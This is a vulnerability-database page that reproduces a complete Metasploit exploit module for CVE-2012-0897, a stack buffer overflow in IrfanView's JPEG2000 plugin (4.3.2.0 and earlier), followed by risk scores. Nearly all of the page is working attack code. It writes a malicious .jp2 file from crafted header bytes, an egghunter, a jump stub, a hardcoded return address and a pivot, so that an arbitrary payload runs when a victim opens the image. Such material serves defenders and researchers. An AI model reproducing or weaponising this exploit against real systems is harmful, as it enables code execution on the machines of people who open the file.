IrfanView JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow (Metasploit)

🗓️ 01 Jul 2012 00:00:00Reported by MetasploitType

Irfanview JPEG2000 <= v4.3.2.0 stack buffer overflow exploi

Reporter	Title	Published	Views	Family All 24
0day.today	Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow	1 Jul 201200:00	–	zdt
Circl	CVE-2012-0897	1 Jul 201200:00	–	circl
CNVD	VMware Horizon Client for windows arbitrary code execution vulnerability (CNVD-2015-03816)	11 Jun 201500:00	–	cnvd
Check Point Advisories	Irfanview JPEG2000 jp2 Stack Buffer Overflow (CVE-2012-0897)	1 Sep 201300:00	–	checkpoint_advisories
CVE	CVE-2012-0897	20 Jan 201217:00	–	cve
Cvelist	CVE-2012-0897	20 Jan 201217:00	–	cvelist
Tenable Nessus	IrfanView JPEG-2000 Plugin Remote Stack-based Buffer Overflow	5 Jul 201200:00	–	nessus
Tenable Nessus	VMware Horizon View Client 3.2.x < 3.2.1 / 3.3.x < 3.4.0 / or 5.x < 5.4.2 Multiple Vulnerabilities (VMSA-2015-0004)	12 Jun 201500:00	–	nessus
Tenable Nessus	VMware Player 6.x < 6.0.6 Multiple Vulnerabilities (VMSA-2015-0004)	16 Jun 201500:00	–	nessus
Tenable Nessus	VMware Player 7.x < 7.1.1 Multiple Vulnerabilities (VMSA-2015-0004)	16 Jun 201500:00	–	nessus

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Remote::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow vulnerability in
				version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been
				tested on a specific version of irfanview (v4.3.2), although other versions may
				work also. The vulnerability is triggered via parsing an invalid qcd chunk
				structure and specifying a malformed qcd size and data.

				Payload delivery and vulnerability trigger can be executed in multiple ways.
				The user can double click the file, use the file dialog, open via the icon
				and drag/drop the file into Irfanview\'s window. An egg hunter is used for
				stability.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Parvez Anwar <parvez[at]greyhathacker.net>', # vulnerability discovery
					'mr_me <steventhomasseeley[at]gmail.com>',    # msf-fu
					'juan vazquez'                                # more improvements
				],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2012-0897' ],
					[ 'OSVDB', '78333'],
					[ 'BID', '51426' ],
					[ 'URL', 'http://www.greyhathacker.net/?p=525' ],
				],
			'Platform'          => [ 'win' ],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Payload'           =>
				{
					'Space'    => 4000,
					'DisableNops' => true,
				},
			'Targets'        =>
				[
					# push esp; retn [i_view32.exe]
					# http://www.oldapps.com/irfanview.php?old_irfanview=7097
					# http://irfanview.tuwien.ac.at/plugins/irfanview_plugins_432_setup.exe
					[ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ]
				],
			'DisclosureDate' => 'Jan 16 2012',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('FILENAME', [ true, 'The output file name.', 'msf.jp2']),
				], self.class)
	end

	# encode our string like unicode except we are not using nulls
	def encode_bytes(raw_bytes)
		encoded_bytes = ""
		0.step(raw_bytes.length-1, 2) { |i|
			encoded_bytes << raw_bytes[i+1]
			encoded_bytes << raw_bytes[i]
		}
		return encoded_bytes
	end

	def exploit
		jp2  = ""
		jp2 << "\x00\x00\x00\x0c"         #
		jp2 << "\x6a\x50\x20\x20"         # [jP  ] <0x6a502020> magic 0xd0a870a,len 12
		jp2 << "\x0d\x0a\x87\x0a"         #
		jp2 << "\x00\x00\x00\x14"         #
		jp2 << "\x66\x74\x79\x70"         #
		jp2 << "\x6a\x70\x32\x20"         #
		jp2 << "\x00\x00\x00\x00"         #         MinorVersion = 0      = [\0\0\0\0]
		jp2 << "\x6a\x70\x32\x20"         #         Compat = 0x6a703220 = [jp2 ]
		jp2 << "\x00\x00\x00\x38"         #
		jp2 << "\x75\x75\x69\x64"         # [uuid] <0x75756964> len 56 data offset 8
		jp2 << "\x61\x70\x00\xde\xec\x87" # 56 bytes with start and end tags
		jp2 << "\xd5\x11\xb2\xed\x00\x50" #
		jp2 << "\x04\x71\xfd\xdc\xd2\x00" #
		jp2 << "\x00\x00\x40\x01\x00\x00" #
		jp2 << "\x00\x00\x00\x00\x60\x09" #
		jp2 << "\x00\x00\x00\x00\x00\x00" #
		jp2 << "\x00\x00\x00\x00\x00\x00" #
		jp2 << "\x00\x00\x30\x00\x00\x00" #
		jp2 << "\x00\x00\x00\x2d"         #
		jp2 << "\x6a\x70\x32\x68"         # [jp2h] <0x6a703268> len 45 data offset 8
		jp2 << "\x00\x00\x00\x16"         #
		jp2 << "\x69\x68\x64\x72"         # [ihdr] <0x69686472> len 22 data offset 8
		jp2 << "\x00\x00\x00\x0a"         #         ImageHeight = 10
		jp2 << "\x00\x00\x00\x0a"         #         ImageWidth = 10
		jp2 << "\x00\x03"                 #         NumberOfComponents = 3
		jp2 << "\x07"                     #         BitsPerComponent = 7
		jp2 << "\x07"                     #         Compression = 7
		jp2 << "\x01"                     #         Colorspace = 0x1 = unknown
		jp2 << "\x00\x00\x00\x00\x0f"     #
		jp2 << "\x63\x6f\x6c\x72"         # [colr] <0x636f6c72> len 15 data offset 8
		jp2 << "\x01"                     #         Method = 1
		jp2 << "\x00"                     #         Precedence = 0
		jp2 << "\x00"                     #         ColorSpaceAproximation = 0
		jp2 << "\x00\x00\x00"             #         EnumeratedColorSpace = 16 = sRGB
		jp2 << "\x10\x00\x00\x00\x00"     #
		jp2 << "\x6a\x70\x32\x63"         # [jp2c] <0x6a703263> length 0 data offset 8
		jp2 << "\xff\x4f"                 # <0xff4f=JP2C_SOC> Start of codestream
		jp2 << "\xff\x51"                 # <0xff51=JP2C_SIZ> length 47
		jp2 << "\x00\x2f"                 #         47 bytes
		jp2 << "\x00\x00"                 #         Capabilities = 0
		jp2 << "\x00\x00\x00\x0a"         #         GridWidth = 10
		jp2 << "\x00\x00\x00\x0a"         #         GridHeight = 10
		jp2 << "\x00\x00\x00\x00"         #         XImageOffset = 0
		jp2 << "\x00\x00\x00\x00"         #         YImageOffset = 0
		jp2 << "\x00\x00\x00\x0a"         #         TileWidth = 10
		jp2 << "\x00\x00\x00\x0a"         #         TileHeight = 10
		jp2 << "\x00\x00\x00\x00"         #         Xtileoffset = 0
		jp2 << "\x00\x00\x00\x00"         #         Ytileoffset = 0
		jp2 << "\x00\x03"                 #         NumberOfComponents = 3
		jp2 << "\x07\x01\x01"             #   Component0Pr=0x7=8 bits un,hsep=1,vsep=1
		jp2 << "\x07\x01\x01"             #   Component0Pr=0x7=8 bits un,hsep=1,vsep=1
		jp2 << "\x07\x01\x01"             #   Component0Pr=0x7=8 bits un,hsep=1,vsep=1
		jp2 << "\xff\x52"                 # <0xff52=JP2C_COD> length 12
		jp2 << "\x00\x0c"                 #   12 bytes
		jp2 << "\x00"                     #   codingStyle=0=entropy coder w/o partition
		jp2 << "\x00"                     #   ProgressionOrder = 0
		jp2 << "\x00\x05"                 #   NumberOfLayers = 0x5
		jp2 << "\x01"                     #   MultiComponentTransform=0x1=5/3 reversible
		jp2 << "\x05"                     #   DecompLevels = 5
		jp2 << "\x04"                     #   CodeBlockWidthExponent=0x4+2 # cbw ->64
		jp2 << "\x04"                     #   CodeBlockHeightExponent=0x4+2 # cbh ->64
		jp2 << "\x00"                     #   CodeBLockStyle = 0
		jp2 << "\x00"                     #   QMIFBankId = 0

		eggoptions =
		{
			:checksum => false,
			:eggtag => 'pwnd'
		}

		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
		qcd_data  = ""
		qcd_data << make_nops(10)
		qcd_data << encode_bytes(hunter)
		qcd_data << rand_text_alpha(146)

		jmp_hunter = %q{
			jmp $-0xad
			inc ecx
		}

		# jump to our egghunter
		jmp_hunter = Metasm::Shellcode.assemble(Metasm::Ia32.new, jmp_hunter).encode_string

		qcd_data << encode_bytes(jmp_hunter)
		qcd_data << rand_text_alpha(196-qcd_data.length)
		qcd_data << encode_bytes([target.ret].pack("V"))

		# align ecx and jmp
		pivot = %q{
			inc ch
			jmp ecx
		}

		pivot  = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string

		qcd_data << encode_bytes(pivot)
		qcd_data << egg

		jp2 << "\xff\x5c"                         # start
		jp2 << "\x00\xf5"                         # arbitrary size to trigger overflow
		jp2 << "\x22"                             # guard
		jp2 << qcd_data                           # malicious code
		jp2 << "\xff\x90"                         # <0xff90=JP2C_SOT>len 10
		jp2 << "\x00\x0a"                         # 10 bytes
		jp2 << "\x00\x00\x00\x00\x00\x68\x00\x01"
		jp2 << "\xff\x93"                         # <0xff93=JP2C_SOD> Start of data
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80"
		jp2 << "\xff\xd9"

		# Create the file
		print_status("Creating '#{datastore['FILENAME']}' file...")

		file_create(jp2)
	end

end

01 Jul 2012 00:00Current

6.9Medium risk

Vulners AI Score6.9

CVSS 26.8

EPSS0.66226